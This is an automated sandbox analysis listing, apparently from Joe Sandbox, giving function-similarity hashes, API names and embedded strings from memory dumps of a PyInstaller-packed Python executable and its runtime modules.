                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$List_$Object_$AppendAttrCallErr_FastLookupSliceStringTuple
                                                    • String ID: __mro_entries__ must return a tuple
                                                    • API String ID: 1865160900-2385075324
                                                    • Opcode ID: 467033a0127221bfa40f722767f11646d0dcbf4943d0c97cc8d9c43896cda3e2
                                                    • Instruction ID: fb788a86f95bdffb25da690bfeba43a5147281fcdde69fe5fd4528962b71bce0
                                                    • Opcode Fuzzy Hash: 467033a0127221bfa40f722767f11646d0dcbf4943d0c97cc8d9c43896cda3e2
                                                    • Instruction Fuzzy Hash: 40416AB2B0BA42A1EA169F76E99427DA3A4EF48BD4F09C035CE2D46774DF3CE0459301
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$CompareString$With$DeallocErr_Ready
                                                    • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                    • API String ID: 1067165228-3528878251
                                                    • Opcode ID: a97fda713efcdaed74d0f15b89fc759eef65b993e3755085a36f180e1a2a6872
                                                    • Instruction ID: b988f50bc5ea979f777908f5ddaa70db4002d3e538d9a90ee6a0d6aa694fbe36
                                                    • Opcode Fuzzy Hash: a97fda713efcdaed74d0f15b89fc759eef65b993e3755085a36f180e1a2a6872
                                                    • Instruction Fuzzy Hash: 254182A1B0E657C9EA56AF32E8442372368BF45B86F8645B9CD4F47790DF6CE0069330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_$AttrDict_Object_String$ClearExceptionItemMatches
                                                    • String ID: __mypyc_attrs__$__mypyc_attrs__ is not a tuple
                                                    • API String ID: 2346549887-4201147154
                                                    • Opcode ID: 97c887f9a55379cd6061ec2239fa0885262fb877c9a2011c0a5dba965d3d668a
                                                    • Instruction ID: 45cbecc10efc526329283156c2ff8329bae3173542d41ca1beb7b17bd933bf15
                                                    • Opcode Fuzzy Hash: 97c887f9a55379cd6061ec2239fa0885262fb877c9a2011c0a5dba965d3d668a
                                                    • Instruction Fuzzy Hash: 97314AB2A0AB4295EA569F36E89427D63A0FF45FD4F098039DE2D06774DF3CE4458301
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: OO|O$optional argument must be a context
                                                    • API String ID: 3219279049-4143137676
                                                    • Opcode ID: a46515a4f6f2f69e0e60290085b09fabc6f98e0f00078889bc04a6c3a0490e87
                                                    • Instruction ID: e0e3d6ef61083c5dbcaae97c8a7108bd58104a1b562f98d5179f8168f5bda382
                                                    • Opcode Fuzzy Hash: a46515a4f6f2f69e0e60290085b09fabc6f98e0f00078889bc04a6c3a0490e87
                                                    • Instruction Fuzzy Hash: 77611BB2E1AA16D8EB168F75D8400BE27B8BB44B94F440076DE0E27664EE3DE546C360
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                    • API String ID: 0-666925554
                                                    • Opcode ID: 1bbb5a14678834b1a958f942c3490a164635d270f47cc7c371ea8b9b6d09e3c4
                                                    • Instruction ID: 0190cd064c25e385b7292367919a27a15d736b7076455ffd5e4312f0d7858d72
                                                    • Opcode Fuzzy Hash: 1bbb5a14678834b1a958f942c3490a164635d270f47cc7c371ea8b9b6d09e3c4
                                                    • Instruction Fuzzy Hash: EC518C61B0C7C251FE30BB31A8506F9A39ABF45BA4F844531DE2D87796EE3CE5458321
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                    • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                    • API String ID: 4998090-2855260032
                                                    • Opcode ID: 325d64cfb385d23493eb0389c0ea059c6d59262dbafda5a72abe8264351e6c2a
                                                    • Instruction ID: 5091bb93fd22be243f411a30a0651f203524a3d1e1ac6d27fc3a0dfc45faf5d1
                                                    • Opcode Fuzzy Hash: 325d64cfb385d23493eb0389c0ea059c6d59262dbafda5a72abe8264351e6c2a
                                                    • Instruction Fuzzy Hash: 6941333161C7C282E660BF75E8446E9B366FB847A4F840231EA6E876D5DF7CD444CB11
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Module_$Dealloc$ObjectObject_$Capsule_ConstantFromMallocMem_SpecStringTrackTypeType_
                                                    • String ID: 14.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
                                                    • API String ID: 288921926-1430584071
                                                    • Opcode ID: 34ac006824e125b38f87d2d071ae01d9c336cf72669efd439cdbfbf994d14880
                                                    • Instruction ID: ebf8cf4169c7ba7191605c94e996a6522488dd2cb9f0f0c96e46391f52a59161
                                                    • Opcode Fuzzy Hash: 34ac006824e125b38f87d2d071ae01d9c336cf72669efd439cdbfbf994d14880
                                                    • Instruction Fuzzy Hash: 09212CE1F0F703C5FA576F35E81417A22ACAF59B90B4A51F4DE1E06694DE2CE9068370
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: __acrt_iob_func$FreeMem_abortfputc
                                                    • String ID: %s:%d: error: $D:\a\1\s\Modules\_decimal\libmpdec\typearith.h$sub_size_t(): overflow: check the context
                                                    • API String ID: 1022196523-3533778181
                                                    • Opcode ID: 713d784ae3a83d11bb089b661ef9a5180dbe69352fb1f5020284205daa2a53dc
                                                    • Instruction ID: 23d7d0f01ad5040523459ac0ba29f26cc018edbdd22928d424a37448bc172023
                                                    • Opcode Fuzzy Hash: 713d784ae3a83d11bb089b661ef9a5180dbe69352fb1f5020284205daa2a53dc
                                                    • Instruction Fuzzy Hash: 8FD1F4A671AAC5C1DA118F25E8043AEA7A9FB45FD4F505139EE5E07B98DF3CD00ACB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: CompareStringUnicode_With$Mem_$FreeMallocSubtypeType_
                                                    • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                    • API String ID: 1723213316-3528878251
                                                    • Opcode ID: c1d1483b359176232031dcda17eceefdd4cd98cc21702f49892afc3e67e82068
                                                    • Instruction ID: af4114e61f3ef657fcc55b71313d3877c3ec003943eb8c266566d90e366ea733
                                                    • Opcode Fuzzy Hash: c1d1483b359176232031dcda17eceefdd4cd98cc21702f49892afc3e67e82068
                                                    • Instruction Fuzzy Hash: BA515CE1B0E252C5FE66AF36E8146BB5358AB41BC4F1650B1DE5E47B81CE6DE4038730
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_end
                                                    • String ID:
                                                    • API String ID: 227901110-0
                                                    • Opcode ID: 61ecb8ec4c46b4e4f4ecd4b2a13dbf42c93996b23c02d945c2fc6fa1b127df7b
                                                    • Instruction ID: 1005aeda6381ab8bb9db2ae95004e7ecf71a8ca8cdfb4fb30f9a5561881e5087
                                                    • Opcode Fuzzy Hash: 61ecb8ec4c46b4e4f4ecd4b2a13dbf42c93996b23c02d945c2fc6fa1b127df7b
                                                    • Instruction Fuzzy Hash: 5441B5B2A0AA4281F75A8F39D99833C66A4AF55B78F198334CE7A016F4CF7DD4858340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Mem_$Free$Err_Malloc$HashMemoryPointerStringmemmove
                                                    • String ID: Cannot hash a signaling NaN value$dec_hash: internal error: please report
                                                    • API String ID: 1495275932-4146688941
                                                    • Opcode ID: 9cd366ce8fd8d8fd14b5555d2db204c7b314a9157a77afb81d300cd1b69b7d69
                                                    • Instruction ID: 0032b98332a343e77d6af286a462337750181997de613f6c749e515e1823977b
                                                    • Opcode Fuzzy Hash: 9cd366ce8fd8d8fd14b5555d2db204c7b314a9157a77afb81d300cd1b69b7d69
                                                    • Instruction Fuzzy Hash: 868184A6E0AB82C5E7128F78D8002ED67A8EB45B68F001275DE9D167D5DF3CD10AC760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFromLong_Ssize_t$DivideNumber_SubtypeTrueType_
                                                    • String ID: __init__$charset_normalizer.md.SuspiciousRange$float$ratio
                                                    • API String ID: 2782116801-2445630910
                                                    • Opcode ID: 39bcd692bf62b8ccf14792af55592120cc0fe07b66120c3091a3aed187f41179
                                                    • Instruction ID: 53cb9f83177879f6fe3a9c750c2ebdeff5653530d0c7da3e14f2b9ed19d0e214
                                                    • Opcode Fuzzy Hash: 39bcd692bf62b8ccf14792af55592120cc0fe07b66120c3091a3aed187f41179
                                                    • Instruction Fuzzy Hash: 04516AA2A0BA5681FA169B36E88427D63A1EF44BD4F088235DE3D077F5DF2CE4518340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatKeywordsParseSubtypeTupleType_
                                                    • String ID: OO|O
                                                    • API String ID: 3104664702-4229707633
                                                    • Opcode ID: 0cba03fe7f2ceab621f130fc5033cb01ca08e311b7ab0defd7ba7ba9bc906242
                                                    • Instruction ID: 6301a3ee833c56ab894053c370bc4801e96738f3d0f5e5703c0333896ba90679
                                                    • Opcode Fuzzy Hash: 0cba03fe7f2ceab621f130fc5033cb01ca08e311b7ab0defd7ba7ba9bc906242
                                                    • Instruction Fuzzy Hash: 03511BB2E1AA12D5EB128F71D8404BE37B8BB45B98B4404B2DE4D23A94DF3DE547C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|OO$internal error in dec_mpd_qquantize$optional argument must be a context
                                                    • API String ID: 3219279049-2753496222
                                                    • Opcode ID: 3415ee9708b1d50977dc94845924ca4995d6baaadcc99fc1e813adf81667f348
                                                    • Instruction ID: 26c3a6c392c89e0df1006d6d764b39f91ae2f8897acae99f3d38f91a0d990c5e
                                                    • Opcode Fuzzy Hash: 3415ee9708b1d50977dc94845924ca4995d6baaadcc99fc1e813adf81667f348
                                                    • Instruction Fuzzy Hash: 57616FB2A0AA42E5EB168F71D8401FE37A8EB54B88F4040B2DE4D53764DF3DE646C360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                    • String ID: P%
                                                    • API String ID: 2147705588-2959514604
                                                    • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                    • Instruction ID: 1fb5cea2d22745308a5aad75a2ecaaeb968f502ae9f829d35afa07a1d340ab56
                                                    • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                    • Instruction Fuzzy Hash: 2D5106266187E186E634AF32A4581FAF7A2F798B65F004121EFDE83684DF3CD045DB20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_Unicode_$ArgumentCheckDigitErr_PositionalReadyString
                                                    • String ID: a unicode character$argument 1$digit$not a digit
                                                    • API String ID: 3305933226-4278345224
                                                    • Opcode ID: f3312c4d2492d42c6bf8c5b24e15dccd6aa38fe551f57dd252bb694573ee7750
                                                    • Instruction ID: b20fe5eff156fbe2fee40ebc968d3767c6d1c94d8df14538aedae09aaf6c8af9
                                                    • Opcode Fuzzy Hash: f3312c4d2492d42c6bf8c5b24e15dccd6aa38fe551f57dd252bb694573ee7750
                                                    • Instruction Fuzzy Hash: 08218CB1B0AA53D2EB16AF32D85417A2368BF44B89F4645B5CE0E46264DF2DE457C330
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 349153199-0
                                                    • Opcode ID: 30123b31d54eba71cecac4d279342515692546ad710b5d5dc74d29f4614bb669
                                                    • Instruction ID: ec64c0bf32b8e81bb9d94830b523f86dca5cfa8dfda7c264d2e05600fafe0711
                                                    • Opcode Fuzzy Hash: 30123b31d54eba71cecac4d279342515692546ad710b5d5dc74d29f4614bb669
                                                    • Instruction Fuzzy Hash: 26819CE1E0E60746FA629B37E8412B96290BF45B80F54C03DEE2D477F6EE3CE545A600
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 349153199-0
                                                    • Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                    • Instruction ID: b56236f85bf7ec83d5341aca54663dfa9ba4c76fcaf2bae711415843475032d1
                                                    • Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                    • Instruction Fuzzy Hash: 3081ACE1F0E643C6F662BF35D4412BB2298AF65B80F5680B4DE5D43296DE2CE8438270
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 349153199-0
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    Similarity
                                                    • API ID: Err_Object_String
                                                    • String ID: argument must be an integer$internal error in flags_as_exception
                                                    • API String ID: 2350702593-646087525
                                                    Similarity
                                                    • API ID: FreeMem_$memmove
                                                    • String ID: 0
                                                    • API String ID: 1110261380-4108050209
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_KeywordsParseStringTuple
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 2016884933-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: 5f6c06ac62897f5fab9e98e8ec98f0c6eb285b5602e67e0a2f60853e5626fac4
                                                    • Instruction ID: 45cd6dd4578c052d900b2dcbdc6fc2201f481d30b5f52cc51b6ee543cba07723
                                                    • Opcode Fuzzy Hash: 5f6c06ac62897f5fab9e98e8ec98f0c6eb285b5602e67e0a2f60853e5626fac4
                                                    • Instruction Fuzzy Hash: 71510DB1E0AB02C4EB128F75D8500BD27A8FB49B98B4410B7DE4D57669DF3CE54AC760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|O$optional argument must be a context
                                                    • API String ID: 3219279049-2061368271
                                                    • Opcode ID: 37d7a4b5c7b375be109cd562857698cbc24862b68caa231ab8609c38e56e2630
                                                    • Instruction ID: cc24b9a84622b7e5872fbbfe900241a13d7966cb084b0fc7b75c3cde8cd58fc0
                                                    • Opcode Fuzzy Hash: 37d7a4b5c7b375be109cd562857698cbc24862b68caa231ab8609c38e56e2630
                                                    • Instruction Fuzzy Hash: 7B413EB2A0AB02D4EB129F75D8504BA3BBCEB48B98B441176DE0D137A5DE3DE547C360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
                                                    • String ID: bool$feed
                                                    • API String ID: 2902451266-2849697477
                                                    • Opcode ID: 5fb1090c9fbe94a1abe1cc5096318bf41d88c1455b742f9e041b56343bd14805
                                                    • Instruction ID: 984e0cc947a455c6978f26ccb129819cf40240d73668c22629367d2aea137cb7
                                                    • Opcode Fuzzy Hash: 5fb1090c9fbe94a1abe1cc5096318bf41d88c1455b742f9e041b56343bd14805
                                                    • Instruction Fuzzy Hash: F6411EB5A0BA0292EE629F76E49527D63A0FF48B84F18C135DE6E077B5DF2CE4408350
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
